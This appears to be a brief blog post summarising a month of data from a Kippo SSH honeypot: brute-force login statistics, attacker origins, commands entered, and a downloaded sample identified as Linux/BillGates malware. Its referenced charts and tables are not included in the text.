Over the last month, I’ve been running Kippo which is an SSH honeypot designed to log brute force attacks and shell interactions performed by the attacker. I thought I’d share some of my results which have been quite interesting!
More information about Kippo can be found at: https://github.com/desaster/kippo
Starting off with some general stats, I’m surprised to see the amount of attention the honeypot has received:
This vertical bar chart displays the top 10 username and password combinations that attackers try when attacking the system:
There seems to be a bit of a theme as to where the connections are coming from (top 5):
I configured a couple of fairly lame username as password combinations to enable successful logins to see what the attacker next steps would be. The following table displays the top 10 commands (overall) entered by attackers in the honeypot system:
The honeypot contains a directory for saving files downloaded by the emulated wget command. This is where the following files were found to have been downloaded:
An md5 sum search on virus total indicates this to be some potentially recently discovered malware, specifically Linux/BillGates x32 i86:
More information about this family of malware can be found at:
http://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html
Lets see what the next month brings!